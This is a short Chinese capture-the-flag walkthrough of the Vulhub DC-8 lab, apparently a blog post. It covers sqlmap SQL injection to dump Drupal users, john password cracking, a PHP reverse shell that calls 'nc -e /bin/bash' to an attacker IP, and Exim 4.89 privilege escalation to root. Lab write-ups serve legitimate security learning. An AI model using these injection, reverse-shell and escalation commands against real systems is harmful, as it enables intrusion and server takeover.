[vulhub靶机通关]DC-8

信息收集

主机探测

端口扫描

访问页面 发现可能存在sql注入

用sqlmap跑一下

sqlmap -u "http://192.168.89.154/?nid=1'" --batch --dbs

爆表

sqlmap -u "http://192.168.89.154/?nid=1'"  -D "d7db" --tables

这么多 查一下users的

将密码复制下来 因为前面探测到了是drupal的cms kali上专门的爆破工具 john

john 1.txt

获得了john的密码

弹一个shell


<?php
exec("nc -e /bin/bash 192.168.89.132 4567");
?>

查找可以提权的文件

find / -perm -4000 -type f 2>/dev/null

有exim4

查找版本

4.89 我们在msf中查找对应的exp

让靶机下载这个

之前已经下载过了 具体步骤为将该文件 移动到

/var/html/www

目录下 kali开启apache

根据手册 命令为 ./46996.sh -m netcat

在root目录里找到flag

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值